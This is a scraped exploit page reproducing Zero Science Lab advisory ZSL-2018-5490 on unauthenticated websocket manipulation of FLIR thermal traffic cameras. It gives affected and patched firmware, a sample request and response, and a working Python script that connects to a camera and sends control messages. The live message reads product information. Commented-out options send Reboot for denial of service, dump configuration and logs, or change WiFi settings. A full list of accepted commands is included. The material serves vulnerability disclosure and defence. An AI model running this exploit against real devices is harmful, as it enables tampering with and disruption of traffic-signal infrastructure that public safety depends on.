Share
## https://sploitus.com/exploit?id=ZSL-2018-5490
<html><body><p>#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# FLIR Systems FLIR Thermal Traffic Cameras Websocket Device Manipulation
#
#
# Vendor: FLIR Systems, Inc.
# Product web page: https://www.flir.com
#
# Affected firmware version: V1.01-0bb5b27 (TrafiOne)     Codename: TrafiOne
#                            E1.00.09      (TI BPL2 EDGE) Codename: TIIP4EDGE
#                            V1.02.P01     (TI x-stream)  Codename: TIIP2
#                            V1.05.P01     (ThermiCam)    Codename: ThermiCam
#                            V1.04.P02     (ThermiCam)    Codename: ThermiCam
#                            V1.04         (ThermiCam)    Codename: ThermiCam
#                            V1.01.P02     (ThermiCam)    Codename: ThermiCam
#                            V1.05.P03     (TrafiSense)   Codename: TrafiSense
#                            V1.06         (VIP-IP)       Codename: VIP-IP
#                            V1.02.P02     (TrafiRadar)   Codename: TrafiRadar
#
# Vendor patched firmware version:
#
# Product name                Firmware      Released 
# ----------------------------------------------------
# ThermiCam / TrafiSense      E1.06.03      17.09.2018
# TI BPL2 EDGE                V1.00         17.09.2018
# TI x-stream                 E1.03.02      17.09.2018
# TrafiOne                    E1.02.02      17.09.2018
# ----------------------------------------------------
#
# Summary: FLIR TrafiOne is an all-round detection sensor for traffic monitoring
# and dynamic traffic signal control. Offered in a compact and affordable
# package, the FLIR TrafiOne uses thermal imaging and Wi-Fi technology to
# adapt traffic signals based on the presence detection of vehicles, bicycles
# and pedestrians while at the same time generating high resolution data at
# intersections and in urban environments. FLIR TrafiOne helps traffic engineers
# to improve traffic flows, reduce vehicle idling time, monitor congestion,
# enhance safety for vulnerable road users, collect data and measure travel and
# delay times for different transport modes.
#
# FLIR TrafiCam is a vehicle presence sensor that combines a CMOS camera and a
# video detector in a single unit. FLIR TrafiCam detects moving and stationary
# vehicles at signalized intersections. Via detection outputs or via IP protocol,
# vehicle presence information is transmitted to the traffic controller so that
# signal timing can be adjusted dynamically. This way, vehicle waiting time at
# traffic lights is reduced and traffic flows are optimized.
#
# FLIR TrafiSense is an integrated thermal sensor and detector for vehicle and bike
# detection. TrafiSense does not need light to operate, but uses the thermal energy
# emitted from vehicles and bicyclists. This enables the sensor to detect vehicles
# and bikes in the darkest of nights, over a long range and in the most difficult
# weather conditions. The result is reliable, 24/7 traffic detection for a wide
# range of applications.
#
# FLIR TrafiRadar vehicle presence sensor is a combination of a video sensor and
# radar. TrafiRadar is typically used for stop bar and advance vehicle presence
# detection, traffic adaptive systems, and dilemma-zone protection and thus improves
# traffic safety and efficiency at signalized intersections. TrafiRadar will warn
# traffic light controllers whenever a vehicle is present in the dilemma zone, either
# extending green or red lights to improve overall safety.and stationary vehicles at
# signalized intersections and collect traffic data at intersections or interurban
# roads. Via detection outputs or via IP protocol, vehicle presence information is
# transmitted to the traffic controller so that signal timing can be adjusted
# dynamically. TrafiCam x-stream offers streaming video at full frame rate, to be
# used for traffic monitoring in a control room.
#
# The VIP series offers multi-functional Video Image Processing modules for traffic
# control. VIP boards integrate automatic incident detection, data collection,
# recording of pre and post incident image sequences and streaming video in one
# board. VIP modules have been installed for road and tunnel projects all over the
# world.
#
# Desc: FLIR thermal traffic cameras suffer from an unauthenticated device manipulation
# vulnerability utilizing the websocket protocol. The affected FLIR Intelligent
# Transportation Systems - ITS models use an insecure implementation of websocket
# communication used for administering the device. Authentication and authorization
# bypass via referencing a direct object allows an attacker to directly modify running
# configurations, disclose information or initiate a denial of service (DoS) scenario
# with Reboot command. The devices do not support the usage of TLS 'wss://' prefix for
# WebSocket Secure connection making the network traffic disclosed in plain-text to
# MitM evil-doers. Also, the web service has an Origin validation security issue and
# is vulnerable to Cross-Site WebSocket Hijacking (CSWSH).
#
# ---
# Request:
#
# GET ws://192.168.1.1:13042/ws/xml2 HTTP/1.1
# Host: 192.168.1.1:13042
# Connection: Upgrade
# Pragma: no-cache
# Cache-Control: no-cache
# User-Agent: Bond/00.7
# Upgrade: websocket
# Origin: zeroscience.mk:1337
# Sec-WebSocket-Version: 13
# Accept-Encoding: gzip, deflate
# Accept-Language: en-US,en;q=0.9
# Cookie: tmhDynamicLocale.locale=%22en%22
# Sec-WebSocket-Key: A5SH9PRtc3rYF49kKO4vmw==
# Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
#
# Response:
#
# HTTP/1.1 101 Switching Protocols
# Server: nginx/1.10.2
# Date: Mon, 13 Aug 2018 02:48:46 GMT
# Content-Length: 0
# Connection: upgrade
# Upgrade: WebSocket
# Sec-WebSocket-Accept: QyXaTdjpCsAyxhVnVqjMg95jepk=
#
# ---
# No HTTP/1.1 401 Unauthorized response observed.
#
# Tested on: nginx/1.12.1
#            nginx/1.10.2
#            nginx/1.8.0
#            Websocket/13 (RFC 6455)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Zero Science Lab - https://www.zeroscience.mk
#
#
# Advisory ID: ZSL-2018-5490
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5490.php
#
# Vendor firmware updates: https://www.flir.com/security/best-practices-for-cybersecurity/
# Vendor cyber hardening guide: https://www.flir.com/globalassets/security/flir-pro-security-cyber-hardening-guide.pdf
#
#
# 26.07.2018
#

from websocket import create_connection as t00t
import time
import sys

endpoint = "/ws/xml2"

if (len(sys.argv) &lt;= 2):
    print '[*] Usage: exploit.py <ipaddress> <port>'
    exit(0)

host = sys.argv[1]
port = sys.argv[2]

# Supported message types:
'''
<message type="SupportedMessages">
<message type="GetMessageConstraints"></message>
<message type="GetSupportedMessages"></message>
<message type="Session"></message>
<message type="Subscription"></message>
<message type="ClearData"></message>
<message type="GetConnectionInformation"></message>
<message type="GetData"></message>
<message type="GetEvents"></message>
<message type="GetLostData"></message>
<message type="GetManagedBy"></message>
<message type="GetPresenceData"></message>
<message type="GetPresenceLevel"></message>
<message type="GetPresenceLevelHistory"></message>
<message type="GetStorageLimits"></message>
<message type="SetConnectionSettings"></message>
<message type="SetManagedBy"></message>
<message type="ClearBootCount"></message>
<message type="ClearHistogram"></message>
<message type="ClearStoredCounter"></message>
<message type="ClearSystemLogs"></message>
<message type="CreateAviSequence"></message>
<message type="DoBadStuff"></message> &lt;-- ;]]
	<message type="ForceEvent"></message>
<message type="ForceKeyframe"></message>
<message type="GetBootCount"></message>
<message type="GetBplSettings"></message>
<message type="GetCameraConfiguration"></message>
<message type="GetCameraDefinitions"></message>
<message type="GetCameraSettings"></message>
<message type="GetConfiguration"></message>
<message type="GetConstraints"></message>
<message type="GetCpuStatistics"></message>
<message type="GetDateTime"></message>
<message type="GetDisplayOverlay"></message>
<message type="GetEventLog"></message>
<message type="GetEventsDescription"></message>
<message type="GetFrameFlow"></message>
<message type="GetHardwareInformation"></message>
<message type="GetHardwareSensors"></message>
<message type="GetHistogram"></message>
<message type="GetImage"></message>
<message type="GetImageSharpness"></message>
<message type="GetLeptonSettings"></message>
<message type="GetLoggingActivation"></message>
<message type="GetMemoryStatistics"></message>
<message type="GetNumberOfOutputs"></message>
<message type="GetOpenEvents"></message>
<message type="GetOutputsState"></message>
<message type="GetPermissions"></message>
<message type="GetProductInformation"></message>
<message type="GetSocketInformation"></message>
<message type="GetState"></message>
<message type="GetStoredCounter"></message>
<message type="GetSystemLogs"></message>
<message type="GetTemperature"></message>
<message type="GetThermalQualityHistogram"></message>
<message type="GetThermalQualityReferenceImage"></message>
<message type="GetThreadInformation"></message>
<message type="GetTime"></message>
<message type="GetTranslations"></message>
<message type="GetUpTime"></message>
<message type="GetVersion"></message>
<message type="GetVoltage"></message>
<message type="GetWifiInformation"></message>
<message type="KeepAlive"></message>
<message type="Notify"></message>
<message type="PauseDetectionFramework"></message>
<message type="Reboot"></message>
<message type="SetBplSettings"></message>
<message type="SetCameraConfiguration"></message>
<message type="SetCameraSettings"></message>
<message type="SetConfiguration"></message>
<message type="SetConstraintsFilter"></message>
<message type="SetDateTime"></message>
<message type="SetDisplayOverlay"></message>
<message type="SetHardwareInformation"></message>
<message type="SetLeptonSettings"></message>
<message type="SetLoggingActivation"></message>
<message type="SetTime"></message>
<message type="SetWifiInformation"></message>
<message type="UpdateFrameFlow"></message>
</message>
'''

socket = t00t("ws://"+host+":"+port+endpoint)

#print 'Sending Reboot message type (DoS)...'
#msg = '<message type='\"Reboot\"'></message>'
#print 'Getting supported messages...'
#msg = '<message type='\"GetSupportedMessages\"'></message>'
#print 'Getting system logs...'
#msg = '<message type='\"GetSystemLogs\"'></message>'
#print 'Getting device configuration...'
#msg = '<message type='\"GetConfiguration\"'></message>'
#print 'Setting new Wifi information...'
#msg ='''
#<message type="SetWifiInformation">
#    </message>
#
#'''

msg = '<message type='\"GetProductInformation\"'></message>'

socket.send(msg)
print 'Message sent.'
print 'Receiving...'
time.sleep(2)
priem =  socket.recv()
print 'Received data: \n%s' % priem
socket.close()
</port></ipaddress></p></body></html>